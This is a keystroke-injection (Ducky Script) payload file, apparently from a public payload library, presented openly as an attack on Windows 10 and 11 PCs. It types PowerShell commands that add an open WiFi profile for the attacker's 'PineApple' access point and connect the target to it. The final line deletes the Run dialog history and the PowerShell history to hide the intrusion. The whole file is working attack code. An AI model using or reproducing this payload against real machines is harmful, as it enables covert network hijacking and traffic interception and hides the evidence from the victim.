Path: blob/master/payloads/library/general/-RD-PineApple/PineApple-KeyInjection.txt
2968 views
1REM Title: PineApple2REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it3REM This version is a direct key stroke injection attack4REM Author: I am Jakoby5REM Target: Windows 10, 1167DELAY 100089REM If the wifi pineapple SSID is detected target PC will connect to it1011GUI r12DELAY 50013STRING powershell14DELAY 50015ENTER1617DELAY 10001819STRING $profilefile="Home.xml";20SHIFT ENTER21STRING $SSID="PineApple";22SHIFT ENTER23STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''24SHIFT ENTER25DELAY 50026STRING $xmlfile="<?xml version=""1.0""?>27SHIFT ENTER28STRING <WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1"">29SHIFT ENTER30STRING <name>$SSID</name>31SHIFT ENTER32STRING <SSIDConfig>33SHIFT ENTER34STRING <SSID>35SHIFT ENTER36STRING <hex>$SSIDHEX</hex>37SHIFT ENTER38STRING <name>$SSID</name>39SHIFT ENTER40STRING </SSID>41SHIFT ENTER42STRING </SSIDConfig>43SHIFT ENTER44STRING <connectionType>ESS</connectionType>45SHIFT ENTER46STRING <connectionMode>manual</connectionMode>47SHIFT ENTER48STRING <MSM>49SHIFT ENTER50STRING <security>51SHIFT ENTER52STRING <authEncryption>53SHIFT ENTER54STRING <authentication>open</authentication>55SHIFT ENTER56STRING <encryption>none</encryption>57SHIFT ENTER58STRING <useOneX>false</useOneX>59SHIFT ENTER60STRING </authEncryption>61SHIFT ENTER62STRING </security>63SHIFT ENTER64STRING </MSM>65SHIFT ENTER66STRING </WLANProfile>67SHIFT ENTER68STRING "69SHIFT ENTER70STRING $XMLFILE > ($profilefile)71SHIFT ENTER72STRING netsh wlan add profile filename="$($profilefile)"73SHIFT ENTER74STRING netsh wlan connect name=$SSID75SHIFT ENTER76STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath7778DELAY 50079ENTER808182